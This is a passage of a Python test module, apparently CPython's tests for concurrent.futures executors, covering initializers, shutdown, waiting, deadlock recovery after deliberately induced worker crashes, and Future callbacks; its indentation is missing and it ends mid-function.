def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, ctx):
mgr = get_context(ctx).Manager()
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = test.support.threading_setup()
def tearDown(self):
test.support.reap_children()
test.support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return get_context(self.ctx)
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
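# For example, create_executor_tests(WaitTests,
#                                    executor_mixins=(ProcessPoolForkMixin,))
# injects a class named "ProcessPoolForkWaitTest" into the module globals.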
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
t1 = time.monotonic()
while not self.executor._broken:
if time.monotonic() - t1 > 5:
self.fail("executor not broken after 5 s.")
time.sleep(0.01)
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
def _prime_executor(self):
pass
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
del executor
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
create_executor_tests(AsCompletedTests)
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertRaises(TypeError):
self.executor.submit(fn=capture, arg=1)
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ExecutorTest):
@unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
def test_ressources_gced_in_workers(self):
        # Ensure that the arguments for a job are correctly gc-ed after the job
# is finished
obj = EventfulGCObj(self.ctx)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def hide_process_stderr():
import io
sys.stderr = io.StringIO()
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
hide_process_stderr()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
hide_process_stderr()
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = 15
@classmethod
def _sleep_id(cls, x, delay):
time.sleep(delay)
return x
def _fail_on_deadlock(self, executor):
# If we did not recover before TIMEOUT seconds, consider that the
# executor is in a deadlock state and forcefully clean all its
        # components.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
        # It should be safe to call executor.shutdown here as all possible
# deadlocks should have been broken.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def test_crash(self):
# extensive testing for deadlock caused by crashes in a pool.
self.executor.shutdown(wait=True)
crash_cases = [
# Check problem occurring while pickling a task in
# the task_handler thread
(id, (ErrorAtPickle(),), PicklingError, "error at task pickle"),
# Check problem occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool,
"exit at task unpickle"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool,
"error at task unpickle"),
(id, (CrashAtUnpickle(),), BrokenProcessPool,
"crash at task unpickle"),
# Check problem occurring during func execution on workers
(_crash, (), BrokenProcessPool,
"crash during func execution on worker"),
(_exit, (), SystemExit,
"exit during func execution on worker"),
(_raise_error, (RuntimeError, ), RuntimeError,
"error during func execution on worker"),
# Check problem occurring while pickling a task result
# on workers
(_return_instance, (CrashAtPickle,), BrokenProcessPool,
"crash during result pickle on worker"),
(_return_instance, (ExitAtPickle,), SystemExit,
"exit during result pickle on worker"),
(_return_instance, (ErrorAtPickle,), PicklingError,
"error during result pickle on worker"),
# Check problem occurring while unpickling a task in
# the result_handler thread
(_return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
"error during result unpickle in result_handler"),
(_return_instance, (ExitAtUnpickle,), BrokenProcessPool,
"exit during result unpickle in result_handler")
]
for func, args, error, name in crash_cases:
with self.subTest(name):
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
executor = self.executor_type(
max_workers=2, mp_context=get_context(self.ctx))
res = executor.submit(func, *args)
with self.assertRaises(error):
try:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_shutdown_deadlock(self):
        # Test that calling shutdown on the pool does not cause a deadlock
# if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=get_context(self.ctx)) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with test.support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
